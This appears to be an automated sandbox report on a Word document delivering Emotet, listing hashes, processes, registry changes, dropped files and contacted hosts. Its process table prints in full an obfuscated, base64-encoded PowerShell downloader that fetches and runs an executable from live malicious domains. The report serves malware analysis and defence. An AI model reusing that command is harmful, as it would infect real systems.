| download: | dlc51-7ws12e-cutccjm |
| Full analysis: | https://app.any.run/tasks/1a4f1b02-915f-4ac4-9722-4c97a6c1a1bc |
| Verdict: | Malicious activity |
| Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date: | March 15, 2019, 03:01:35 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 14 20:23:00 2019, Last Saved Time/Date: Thu Mar 14 20:23:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0 |
| MD5: | F820B097CE4C9AD5E50CEDF97AB05DF9 |
| SHA1: | 13008AF271DFBEEC0678AB7DB05F3A37C4EC4A66 |
| SHA256: | 05F052ACA11AD0D1D2DABEA4CE046669131B23C30347E864E373BF2F02A84606 |
| SSDEEP: | 6144:G77HUUUUUUUUUUUUUUUUUUUT52V9jCeTxbHN5e36IHyJsULKM+w:G77HUUUUUUUUUUUUUUUUUUUTChZbHmKH |
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
| Title: | - |
|---|---|
| Subject: | - |
| Author: | - |
| Keywords: | - |
| Comments: | - |
| Template: | Normal.dotm |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2019:03:14 20:23:00 |
| ModifyDate: | 2019:03:14 20:23:00 |
| Pages: | 1 |
| Words: | - |
| Characters: | 4 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | - |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 4 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1840 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | 174.exe | ||||||||||||
User: admin Company: Qihu 360 Software Co., Ltd. Integrity Level: MEDIUM Description: 360 Internet Security Internet Protection Exit code: 0 Version: 2, 0, 0, 1200 Modules
| |||||||||||||||
| 2844 | powershell -e LgAgACgAIAAkAFAAcwBIAG8ATQBlAFsANABdACsAJABQAHMAaABPAG0ARQBbADMAMABdACsAJwBYACcAKQAoAG4ARQBXAC0AbwBiAEoAZQBjAFQAIABJAG8ALgBDAE8AbQBwAFIARQBTAFMASQBPAG4ALgBEAGUAZgBMAEEAdABFAHMAVAByAEUAQQBtACgAWwBpAG8ALgBNAEUAbQBPAFIAWQBTAHQAcgBFAGEAbQBdAFsAcwBZAFMAVABFAE0ALgBjAG8AbgBWAGUAUgB0AF0AOgA6AEYAcgBvAE0AYgBBAHMAZQA2ADQAUwB0AHIAaQBuAEcAKAAoACcAVgBaACcAKwAnAEIAZABhADkAcwB3AEYAJwArACcASQBiAC8AaQBpADQATQBTAHMAaABzAHoAJwArACcANgB0AGgAcAAnACsAJwBjAGIAUQBJACcAKwAnADQAdQBHAFEATgBrAHcASQBUAFEAJwArACcATgAnACsAJwBnADIAQQAnACsAJwByAEoANQBGAGkAVwB6AEsATwBFAHEAZQBFACcAKwAnAC8AUAAnACsAJwBmACcAKwAnAEoAJwArACcAVwA5AHAAdQB1AGgAVABQAGUAYgArACcAKwAnADgAJwArACcASABOACcAKwAnAGcAaQBBADgAaABTACsAaABPAG0ASABHAEsAYQBlACcAKwAnAEEAcgBXAHoAUAAnACsAJwBCAFUAWQArACsAYgAnACsAJwBjAG8ALwBDAGsAaAA5AG8AZwB4AGMAcwAnACsAJwBzACcAKwAnADEAcQBoAHQAJwArACcAZwBQAGcAVABuAGcAJwArACcARQAnACsAJwBLAFoAJwArACcAWABXACcAKwAnAHQAbwBlACcAKwAnAEgATQAnACsAJwBMAFMAeQAwAEwASwBWACcAKwAnAHgAbgBiAEsAeQBxAE0ASQBoACcAKwAnAEcAJwArACcAbgBDACcAKwAnAHYAdgBXAEwAVABhACcAKwAnAE4AMABlAEYAYwArAGgAJwArACcANAAvAHYAWgBOAC8AMwB3AFUAJwArACcANwAwADAAcABnACcAKwAnAFcAJwArACcAOABRADgAJwArACcAbgBkAHMAbwB2AEgAVwBhACcAKwAnAC8AMwBYADkAJwArACcAaQBWAGkAcABkAGEAVgAnACsAJwBVAEYAJwArACcAbwBoAGkAJwArACcARQBsAEIAYgAxAGMAWQBPAEgAOABPAG4AMQAnACsAJwBqAHYAMQBEAEsAJwArACcAZgAyADIAJwArACcATQBiADIAdQAnACsAJwBUAGIARQBKAE4ATgBwACcAKwAnAFAAJwArACcAegA2AGkATABvADcALwBjACcAKwAnAGcASABWAE8AcABzAFgAdQA0AFAAegAnACsAJwBDACcAKwAnADgAOQA0ADAAeAAnACsAJwBmADAAcAAzAEoAYwBoAEQAZQBaAHQAcgBlAHkASQBQAHQASgB4ADQAagAnACsAJwBVAHcAJwArACcAaABWAFUAZgBMAFYATgBhAGMARABnACcAKwAnAEQAdQBDAFYAeQBxAEcAQQBCAEoAJwArACcAQwBVADAAKwBqACcAKwAnADQAcwBBADUAJwArACcAdwBEAFoAJwArACcAOAAnACsAJwB3AGgAegArAGQAJwArACcAVgBsAEMAOABpADkAegBkACcAKwAnAG4AQQAnACsAJwBQAGsAcQA5AFYAQwBmACcAKwAnAEgAbwA0AEgANwBOAHIATwBiACcAKwAnAEYAVwBOAEUAJwArACcALwBxAEwAJwArACcAVAAnACsAJwBtADQAQwBFAHgAcgBnAEcAVwAnACsAJwBtAHkATgBSACcAKwAnADAAVwBRAG8ANgA4ADUAVABKAGYARwAnACsAJwBVAGEAVQBKAGgAOQBiAGoAJwArACcAaQArADIAZQAnACsAJwA3ACcAKwAnAHYAYwB0AGcALwAnACsAJwA0ACcAKwAnAHIAJwArACcAZABTAFQAVQAzAHIASAAnACsAJwB2ADUAQwBiAGwAOAB0ACcAKwAnADYAYwAnACsAJwBxACcAKwAnAG8AOQBRAEoAegBTAEwATQAnACsAJwB1AGMAQwBVADEAbQBXACcAKwAnAHoAJwArACcASQBhACcAKwAnAFQAZABIACcAKwAnADYAJwArACcATQA0AHYATgBCACcAKwAnAHgAJwArACcAbgBVAHEAJwArACcASABkAFcARQBuACsASABKACcAKwAnAFAANwBxADMAcABoACcAKwAnAGMAJwArACcAWgAnACsAJwB2AHAAJwArACcAawAnACsAJwBLAHYAeQAnACsAJwBQACcAKwAnAGMAKwBVAFoARwB6AHEAbgBsACcAKwAnAEwAawB3ACcAKwAnAGEAMABhACcAKwAnAFQAJwArACcAMABrACcAKwAnAFcAdAAnACsAJwBrAHUAdAAnACsAJwBWAEYARgBiAEkAJwArACcAeQAnACsAJwAvAFgAcQB6AFcATgAnACsAJwB1AFkAQwBwAFMAMgAnACsAJwBxADYAagAzAGwAMQB4AG0AJwArACcAdgB3ACcAKwAnAEcAJwApACkAIAAsACAAWwBpAE8ALgBjAE8ATQBQAHIARQBTAHMAaQBPAG4ALgBDAE8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAEQAZQBdADoAOgBEAGUAYwBPAE0AcABSAEUAcwBTACkAfABmAG8AcgBFAGEAQwBIAHsAIABuAEUAVwAtAG8AYgBKAGUAYwBUACAAIABpAE8ALgBzAHQAUgBlAEEATQBSAEUAYQBkAEUAUgAoACAAJABfACAALAAgAFsAcwB5AFMAdABlAE0ALgBUAGUAeABUAC4ARQBuAGMATwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQApACAAfQAgAHwAIABGAG8AcgBlAEEAQwBIAHsAIAAkAF8ALgBSAGUAYQBEAFQAbwBlAE4AZAAoACkAfQApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2944 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\dlc51-7ws12e-cutccjm.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3276 | "C:\Users\admin\174.exe" | C:\Users\admin\174.exe | 174.exe | ||||||||||||
User: admin Company: Qihu 360 Software Co., Ltd. Integrity Level: MEDIUM Description: 360 Internet Security Internet Protection Exit code: 0 Version: 2, 0, 0, 1200 Modules
| |||||||||||||||
| 3336 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | — | wabmetagen.exe | |||||||||||
User: admin Company: Qihu 360 Software Co., Ltd. Integrity Level: MEDIUM Description: 360 Internet Security Internet Protection Exit code: 0 Version: 2, 0, 0, 1200 Modules
| |||||||||||||||
| 4092 | "C:\Users\admin\174.exe" | C:\Users\admin\174.exe | — | powershell.exe | |||||||||||
User: admin Company: Qihu 360 Software Co., Ltd. Integrity Level: MEDIUM Description: 360 Internet Security Internet Protection Exit code: 0 Version: 2, 0, 0, 1200 Modules
| |||||||||||||||
| (PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | :2% |
Value: 3A322500800B0000010000000000000000000000 | |||
| (PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1315897374 | |||
| (PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1315897488 | |||
| (PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1315897489 | |||
| (PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: 800B0000FC3B167ADBDAD40100000000 | |||
| (PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | !4% |
Value: 21342500800B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | !4% |
Value: 21342500800B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2944) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8E9A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2844 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MNP6NBN4MBQEA0Q8I6MG.temp | — | |
MD5:— | SHA256:— | |||
| 2944 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
| 2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$c51-7ws12e-cutccjm.doc | pgc | |
MD5:— | SHA256:— | |||
| 2844 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199be8.TMP | binary | |
MD5:— | SHA256:— | |||
| 2844 | powershell.exe | C:\Users\admin\174.exe | executable | |
MD5:— | SHA256:— | |||
| 3276 | 174.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:— | SHA256:— | |||
| 2844 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2844 | powershell.exe | 45.252.248.18:443 | thanhphotrithuc.com | AZDIGI Corporation | VN | malicious |
2844 | powershell.exe | 60.248.112.142:443 | www.gcwhoopee.com | Data Communication Business Group | TW | suspicious |
Domain | IP | Reputation |
|---|---|---|
thanhphotrithuc.com |
| malicious |
www.gcwhoopee.com |
| suspicious |